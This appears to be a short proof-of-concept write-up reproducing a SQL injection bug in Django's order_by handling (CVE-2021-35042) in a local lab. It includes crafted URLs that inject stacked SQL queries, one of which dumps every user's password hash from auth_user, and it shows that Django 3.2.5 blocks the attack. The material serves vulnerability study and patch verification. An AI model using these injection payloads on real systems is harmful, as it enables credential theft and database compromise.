Django SQL injection bug
Question: explore how exploitable is it?
Answer: I'm terrified
poetry install
poetry run ./ migrate
poetry run ./ loaddata dummydata.json
poetry run ./ runserver
go to http://localhost:8000/?order_by=%22core_things_tags%22.%22things_id%22
note that the ?order_by param is passing a Raw SQL reference to a
column "core_things_tags"."things_id"
This feels like about as far as you can get: http://localhost:8000/?order_by=%22core_things_tags%22.%22things_id%22%20and%201);%20select%201%20as%20name%20;-- which closes the first SQL query translates to the follow SQL:
SELECT "core_things"."id",
COUNT("core_things_tags"."tag_id") AS "num_tags"
FROM "core_things"
LEFT OUTER JOIN "core_things_tags" ON ("core_things"."id" =
GROUP BY "core_things"."id", "core_things"."name",
("core_things_tags"."things_id" and 1);
select 1 as name;--) ORDER BY ("core_things_tags"."things_id" and 1); select 1 as name ;--) ASC LIMIT 21; args=()
which fails with:
Warning at /
You can only execute one statement at a time.
this is just because sqlite can only run 1 query at a time
export DJANGO_DATABASE_URL=postgres://user:pass@localhost:5432/cve-2021-35042 # make this a valid DATABASE_URL for your own postgres server
poetry run ./ migrate
poetry run ./ loaddata dummydata.json
poetry run ./ createsuperuser
# follow prompts
which runs the following sql:
SELECT "core_things"."id",
COUNT("core_things_tags"."tag_id") AS "num_tags"
FROM "core_things"
LEFT OUTER JOIN "core_things_tags" ON ("core_things"."id" =
GROUP BY "core_things"."id", ("core_things_tags"."things_id");
SELECT 1 as id, "password" as name, 1 as num_tags
from "auth_user";--) ORDER BY ("core_things_tags"."things_id" ); SELECT 1 as id, "password"as name, 1 as num_tags from "auth_user";--) ASC;
you can now do basically anything. This query steals the password hash for every user.
now temporarily upgrade django
poetry shell
pip install Django==3.2.5
revisit the above URL and note that it no longer works:
FieldError at /
Cannot resolve keyword '"core_things_tags"."things_id"' into field. Choices are: id, name, num_tags, tags